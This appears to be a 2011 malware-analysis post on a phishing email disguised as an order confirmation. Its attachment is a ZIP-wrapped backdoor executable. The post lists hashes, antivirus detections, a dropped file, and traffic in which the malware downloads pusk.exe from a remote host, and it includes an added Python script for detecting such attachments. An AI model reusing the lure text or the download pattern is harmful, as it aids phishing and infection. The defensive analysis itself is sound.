Malware: Successfull Order 386284


Another suspicious email spreading malware:

Received: from [246.236.108.228] (helo=waeztfotlyzjd.jxokxslnvzq.org)
From: " Bobijou Inc" <premierednxez86@expdel.com>
Subject: Successfull Order 386284
Return-Path: <premierednxez86@expdel.com>

Message:

Thank you for ordering from Bobijou Inc.
 
This message is to inform you that your order has been received and is currently
being processed.
 
Your order reference is 061042.
You will need this in all correspondence.
 
This receipt is NOT proof of purchase.
We will send a printed invoice by mail to your billing address.
 
You have chosen to pay by credit card.
Your card will be charged for the amount of 244.00 USD and “Bobijou Inc.” will
appear next to the charge on your statement.
 
You will receive a separate email confirming your order has been despatched.
 
Your purchase and delivery information appears below in attached file.
 
Thanks again for shopping at Bobijou Inc.

Attached is a file with no extension:

Report date: 2011-04-27 11:18:14 (GMT 1)
File name: order-details
File size: 6321 bytes
MD5 hash: 50b3029c2c9140459207da38d5bac01b
SHA1 hash: 42bc94f02910a21d44386a673977fe7f100cf07c
Detection rate: 3 on 6 (50%)
Status: INFECTED

Scanner         Date        Engine version  Detection
AVG             27/04/2011  10.0.0.1190     Generic22.TSN
Avira AntiVir   27/04/2011  7.11.7.12       TR/Kazy.20399
Emsisoft        27/04/2011  5.1.0.2         Backdoor.Win32.Hostil!IK

The file is actually a ZIP archive, and it contains an executable:

Report date: 2011-04-27 11:23:31 (GMT 1)
File name: order-details-exe
File size: 18432 bytes
MD5 hash: 60ca989549d4dc3be9fe80a1004ada72
SHA1 hash: 328d80999b079b627f343eec38d366f1aea705c3
Detection rate: 3 on 6 (50%)
Status: INFECTED

Scanner         Date        Engine version  Detection
AVG             27/04/2011  10.0.0.1190     Generic22.TSN
Avira AntiVir   27/04/2011  7.11.7.12       TR/Kazy.20399
Emsisoft        27/04/2011  5.1.0.2         Backdoor.Win32.Hostil!IK
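As an added example (not code from the original post), here is a Python triage routine for mail-gateway or sandbox use that flags exactly this pattern: an extensionless attachment whose bytes are really a ZIP archive wrapping a Windows PE, checked against the MD5 hashes reported above. The sample archive it builds is constructed here and contains only an "MZ" stub, not the real file.

```python
import hashlib
import io
import zipfile

# MD5 hashes reported in this post for the attachment, the embedded PE and the dropped file
KNOWN_BAD_MD5 = {
    "50b3029c2c9140459207da38d5bac01b": "order-details (ZIP attachment)",
    "60ca989549d4dc3be9fe80a1004ada72": "order-details-exe (embedded PE)",
    "7eaa0888fcedb00a587d7b419d219d5a": "%Temp%\\pusk.exe (dropped file)",
}
ZIP_MAGIC = b"PK\x03\x04"     # local file header of a ZIP archive
PE_MAGIC = b"MZ"              # DOS stub signature at the start of every PE file
MAX_MEMBER = 50 * 1024 * 1024  # refuse to inflate oversized members (zip-bomb guard)


def triage_attachment(name: str, data: bytes) -> dict:
    """Inspect one attachment and return findings plus a block/allow verdict."""
    md5 = hashlib.md5(data).hexdigest()
    findings, executables = [], []
    if "." not in name:
        findings.append("no file extension")
    if md5 in KNOWN_BAD_MD5:
        findings.append("known hash: " + KNOWN_BAD_MD5[md5])
    if data.startswith(ZIP_MAGIC):            # content type by magic, never by name
        findings.append("content is a ZIP archive")
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                if info.file_size > MAX_MEMBER:
                    findings.append("oversized member skipped: " + info.filename)
                    continue
                member = zf.read(info)
                if member.startswith(PE_MAGIC):
                    executables.append(info.filename)
                inner = hashlib.md5(member).hexdigest()
                if inner in KNOWN_BAD_MD5:
                    findings.append("known hash inside archive: " + KNOWN_BAD_MD5[inner])
    if executables:
        findings.append("archive contains executable(s): " + ", ".join(executables))
    block = bool(executables) or any(f.startswith("known hash") for f in findings)
    return {"md5": md5, "executables": executables, "findings": findings, "block": block}


def build_sample() -> bytes:
    """Constructed test input: a ZIP wrapping a fake PE stub (hypothetical, not the real sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("order-details.exe", PE_MAGIC + b"\x00" * 64)
    return buf.getvalue()
```

The hash match only catches this exact sample; the magic-byte check is what generalises to the next extensionless ZIP-with-PE attachment.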

The malware creates the following file:

%Temp%\pusk.exe (7EAA0888FCEDB00A587D7B419D219D5A)

Network traffic:

GET /pusk.exe HTTP/1.1
Host: variantov. com
 
GET /f/g.php HTTP/1.1
Host: kkojjors. net

URLVoid domain analysis:

http://www.urlvoid.com/scan/variantov.com
http://www.urlvoid.com/scan/kkojjors.net
